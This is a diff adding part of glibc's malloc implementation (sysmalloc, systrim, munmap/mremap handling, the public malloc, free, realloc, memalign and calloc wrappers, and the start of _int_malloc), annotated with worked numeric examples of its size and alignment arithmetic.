+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for the fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+                      chunk_at_offset (old_top, old_size)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
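+
+/*
+   Note on the fenceposts above (illustrative; assumes SIZE_SZ == 8):
+   when sysmalloc cannot merge the new space with the old top chunk,
+   old_top is shrunk by at least 4 * SIZE_SZ and two fake 0x10-byte
+   headers with PREV_INUSE set (size field 0x11) are written at its end.
+   These artificial "chunks" are too small to ever be allocated and stop
+   consolidation from walking past memory this arena actually owns.
+ */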
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
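+
+/*
+   Worked example (illustrative; assumes MINSIZE == 0x20 and 4 KiB pages):
+   with chunksize (av->top) == 0x42000 and pad == 0x20000,
+
+     top_area = 0x42000 - 0x20 - 1                      = 0x41fdf
+     extra    = ALIGN_DOWN (0x41fdf - 0x20000, 0x1000)  = 0x21000
+
+   so sbrk (-0x21000) is attempted and, if the full amount is released,
+   the top chunk shrinks to 0x21000 bytes.
+ */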
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore the MORECORE return value,
+         and instead call again to find out where the new end of memory is.
+         This avoids problems if the first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - p->prev_size;
+  size_t total_size = p->prev_size + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least), so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
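+
+/*
+   The prev_size trick used above (illustrative): for an mmapped chunk
+   that was shifted forward by a front-alignment correction C in
+   sysmalloc, p->prev_size == C, so
+
+     block      = (uintptr_t) p - C     == start of the mapping
+     total_size = C + chunksize (p)     == length of the mapping
+
+   Both are page multiples, which is exactly what the sanity check and
+   the final __munmap call rely on.
+ */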
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = p->prev_size;
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead, as in sysmalloc's mmap path. */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert ((p->prev_size == offset));
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
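+
+/*
+   Sketch (illustrative, not part of this file): __libc_malloc consults
+   __malloc_hook before doing any real work, so a debugger or wrapper
+   can interpose itself with nothing more than a pointer store.  A
+   minimal hook, assuming the deprecated declarations in <malloc.h>,
+   could look like:
+
+     static void *
+     my_malloc_hook (size_t bytes, const void *caller)
+     {
+       __malloc_hook = NULL;              // disarm so the nested call reaches _int_malloc
+       void *p = malloc (bytes);
+       __malloc_hook = my_malloc_hook;    // re-arm for the next call
+       return p;
+     }
+
+   installed early on with:  __malloc_hook = my_malloc_hook;
+ */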
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && p->size > mp_.mmap_threshold
+          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
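+
+/*
+   Example of the dynamic threshold adjustment above (illustrative;
+   default tunables assumed): freeing an mmapped chunk of chunksize
+   0x101000 while mp_.mmap_threshold is still the default 0x20000 sets
+
+     mp_.mmap_threshold = 0x101000
+     mp_.trim_threshold = 0x202000
+
+   so later requests of that size are served from the heap instead of
+   paying an mmap/munmap round trip each time.
+ */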
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  (void) mutex_lock (&ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  (void) mutex_unlock (&ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
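+
+/*
+   Worked example for the mmapped branch above (illustrative; SIZE_SZ == 8
+   and HAVE_MREMAP disabled): with oldsize == 0x22000, a request that
+   normalizes to nb == 0x13000 satisfies oldsize - SIZE_SZ >= nb and
+   simply returns oldmem.  A request normalizing to nb == 0x30000
+   instead allocates a new block, copies oldsize - 2 * SIZE_SZ ==
+   0x21ff0 bytes, and hands the old mapping to munmap_chunk.
+ */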
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
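+
+/*
+   Example of the alignment fixups above (illustrative; MALLOC_ALIGNMENT
+   == 16 assumed): memalign (8, n) relays straight to malloc, while a
+   non-power-of-two request such as memalign (48, n) is rounded up to
+   the next power of two the loop reaches, 64, before _int_memalign is
+   called.
+ */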
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
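+
+/*
+   Example (illustrative; 4 KiB pages assumed): pvalloc (10) rounds the
+   request up to a whole page, so it behaves like memalign (0x1000,
+   0x1000) and returns a page-aligned block with a full page usable,
+   whereas valloc (10) only page-aligns the start of a 10-byte request.
+ */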
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    (void) mutex_unlock (&av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 with 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
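+
+/*
+   Clearing example (illustrative; SIZE_SZ == 8): for a chunk with
+   csz == 0x40 the usable region is clearsize = 0x38 bytes, i.e.
+   nclears == 7 words, so the unrolled path above writes d[0]..d[6];
+   anything with more than 9 words falls back to memset.
+ */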
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
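+
+/*
+   Size normalization example (illustrative; 64-bit defaults assumed):
+   malloc (24) becomes nb = 0x20 and malloc (56) becomes nb = 0x40 via
+   checked_request2size, giving fastbin_index () values 0 and 2
+   respectively; with the default get_max_fast () of 0x80, every request
+   up to nb == 0x80 is eligible for the fastbin fast path below.
+ */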
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+              if (__glibc_unlikely (bck->fd != victim))
+                {
